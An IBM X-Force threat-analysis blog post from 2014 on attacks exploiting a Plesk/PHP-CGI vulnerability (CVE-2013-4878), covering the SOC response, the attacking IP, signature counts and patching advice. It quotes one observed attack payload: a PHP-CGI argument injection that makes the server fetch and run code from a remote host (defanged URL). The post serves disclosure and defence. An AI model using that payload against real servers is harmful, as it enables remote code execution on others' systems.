Six Month Old Vulnerability Exploit Attempt

January 13, 2014
| |
2 min read

Background on Six Month Old Vulnerability Exploit Attempt

The IBM X-Force Threat Analysis Service (XFTAS) reports on vulnerabilities that need to be brought to the attention of our customers. Such was the case in June of 2013. We found a report on a Plesk Control Panel vulnerability (CVE-2013-4878) and provided the following assessment at that time:

Critical Plesk Vulnerability

Exploit code has been released that is reported to target versions 8.6, 9.0, 9.2, 9.3, and 9.5.4 of Plesk running on the Linux and FreeBSD operating systems. Plesk is a commercial software web administration package that allows an administrator to easily set up new websites, email accounts, and DNS entries via a web-based interface. The vulnerability is reported to rely on a non-default setting in Plesk which exposes the entire /usr/bin directory to the Internet. An attacker who successfully exploits this vulnerability can gain shell access to the victim’s server. Customers should verify that the following Plesk configuration entry is not present:

ScriptAlias /phppath/ “/usr/bin/”

Plesk administrators should contact their distribution channels for more information regarding configuration best practices.

Event

During the weekend of January 4th, the SOC began seeing attacks on our customers that appeared to be attempting to exploit this vulnerability. The payload of these attacks looked like this:

-d+allow_url_include=on+-d+safe_mode=off+-d+suhosin.simulation=on+-d+max_execution_time=0+-d+open_basedir=none+-d+auto_prepend_file=hXXp://isp.vc/packets.txt+-d+cgi.force_redirect=0+-d+cgi.redirect_status_env=0+-n

Actions Taken

The SOC escalated the event to management and began contacting affected customers. Further analysis of the attack revealed only one attacking IP, 80.82.78.9. It also gave a strong indication that the attack was against the Internet as a whole and not any specific customer or industry. While researching the attack, we saw that other organizations, such as ISC, were aware of activity from this IP address as well. In their report, however, the attack they noted appeared to be targeting potentially vulnerable Linksys devices.

Data Seen

The top ten signatures seen in connection with this attack were:

Count
Signature

206,235

TCP_Service_Sweep

10,394

HTTP: Detect PHP-CGI Remote code Execution vulnerability

3,477

PHP Remote Code Execution

2,212

TCP_Probe_Other

1,803

ICMP_Flood

820

SERVER-WEBAPP PHP-CGI remote file include attempt

453

PHP CGI Query String Parameter Handling Information Disclosure and DoS Vulnerability(34804)

450

SYNFlood

227

TCP SYN Host Sweep

177

PHP CGI Query String Parameter Handling Code Injection Vulnerability(34790)

This is a common tactic among attackers. First they scan for open ports and then, based on their recon, select an appropriate attack vector from the exploits they have in stock.

Summary and Recommendations

Attacks, such as this one, only reinforces the XFTAS’ recommendations to keep operating systems and applications patched in a timely manner. Attacks against new vulnerabilities do not always occur immediately after their announcement. Sometimes, as in this case, it may be months before the vulnerability is exploited.

Further References

Bryan Ivey
Cyber Threat and Intelligence Analyst, IBM X-Force

Bryan Ivey joined Internet Security Systems as the IT department at the end of 1996. After nearly fourteen years in IT, he joined the X-Force Threat Analysi...
read more